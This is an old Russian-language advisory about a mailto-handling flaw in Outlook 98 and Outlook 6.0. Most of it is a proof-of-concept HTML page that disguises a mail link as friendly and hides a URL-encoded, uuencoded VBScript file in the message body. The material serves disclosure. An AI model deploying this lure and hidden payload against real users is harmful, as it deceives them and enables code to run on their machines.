Некоторые почтовые клиенты неправильно
обрабатывают ссылку mailto, так что существует
возможность выполнить произвольный скрипт
на машине клиента (например, незаметно для
пользователя создать письмо и прикрепить к
нему файл).
Уязвимые системы:
Outlook 6.0
Outlook 98
Пример:
<html>
<head>
<title>Demonstration of Malicious mailto's</title>
</head>
<body>
<b> Please click this friendly link to send me mail </b><br>
<!-- This Link should hide a uuencoded VBScript at the bottom of a email
-->
<!-- Written & Discovered by <DontPanic999@yahoo.com> -->
<!-- nb. Works just the same without the "Always Scroll Down bit" !
-->
<a href="mailto:victim@victim.com?body=
Always%20Scroll%20Down%20When%20Following%20 mailto's!%0D%0A%0D%0A%0D%0A%0D%0A
%0D%0A%0D%0A%0D%0A%0D%0A%0D%0 A%0D%0A%0D%0A%0D%0A%0D%0A%0D%
0A%0D%0A%0D%0A%0D%0A%0D%0A%0D% 0A%0D%0A%0D%0A%0D%0A%0D%0A%62%
65%67%69%6E%20%36%36%36%20%78%2E% 76%62%73%0D%0A%4D%33%35%2D%27%30
%44%5D%38%28%45%31%48%3A%37%2C%40 %3D%56%25%53%28%26%24%40%3A%26%45
%44%39%26%35%4E%28%26%25%54%3D%26 %25%43%3A%26%55%45%3B%47%30%41%28
%23%51%44%3B%56%59%54%3C%26%25%4E %0D%0A%31%3A%36%2C%59%2E%33%45%20
%3E%36%25%48%3B%56%5C%4E%38%56%5D %4D%2F%42%28%60%0D%0A%60%0D%0A%65
%6E%64%0D%0A">webmaster@notavictim.com </a><br>
<p>
</body>
</html>
